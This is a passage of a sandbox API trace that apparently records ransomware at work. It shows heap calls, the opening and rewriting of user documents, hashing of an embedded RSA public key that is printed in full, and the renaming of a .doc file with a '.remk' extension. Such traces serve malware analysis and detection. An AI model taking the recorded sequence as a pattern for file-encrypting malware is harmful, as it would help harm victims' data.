(HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfe0 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf80 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf98 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf68 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edff8 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfc8 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfb0 [0231.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee010 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfb0 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edfb0 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfc8 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf80 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf80 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfe0 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee010 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf80 | out: hHeap=0x630000) returned 1 [0231.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfb0 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edff8 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf98 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf68 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf50 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c18c0 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.717] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x111a0, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x111a0, lpOverlapped=0x0) returned 1 [0231.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0231.717] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x111a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.717] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.718] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.718] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.718] CloseHandle (hObject=0x640) returned 1 [0231.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.723] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2Tp_ LqkBdu-05P.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tp_ lqkbdu-05p.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2Tp_ LqkBdu-05P.doc.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tp_ lqkbdu-05p.doc.remk")) returned 1 [0231.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.723] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0231.725] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa48540, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0xd2899e0, ftLastAccessTime.dwHighDateTime=0x1d5d8e6, ftLastWriteTime.dwLowDateTime=0xd2899e0, ftLastWriteTime.dwHighDateTime=0x1d5d8e6, nFileSizeHigh=0x0, nFileSizeLow=0xacbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UWCg-ihWXmwSV 3j.docx", cAlternateFileName="2UWCG-~1.DOC")) returned 1 [0231.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.725] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UWCg-ihWXmwSV 3j.docx") returned=".docx" [0231.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UWCg-ihWXmwSV 3j.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2uwcg-ihwxmwsv 3j.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.727] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=44220) returned 1 [0231.727] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.730] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xac96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.730] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.732] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.732] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xacbc, lpOverlapped=0x0) returned 1 [0231.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.733] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.734] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.734] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.734] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.734] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.734] GetLastError () returned 0x0 [0231.734] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.734] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.734] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.734] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.734] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xacc0) returned 0x37c2278 [0231.735] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c18c0 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf50 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1908 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf68 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf98 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edff8 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfb0 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.735] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf98 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfb0 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edff8 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edff8 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edfb0 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edf98 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfb0 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf98 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edff8 | out: hHeap=0x630000) returned 1 [0231.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.737] GetCurrentThreadId () returned 0x314 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697fd8 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.737] RtlAllocateHeap (HeapHandle=0x630000, 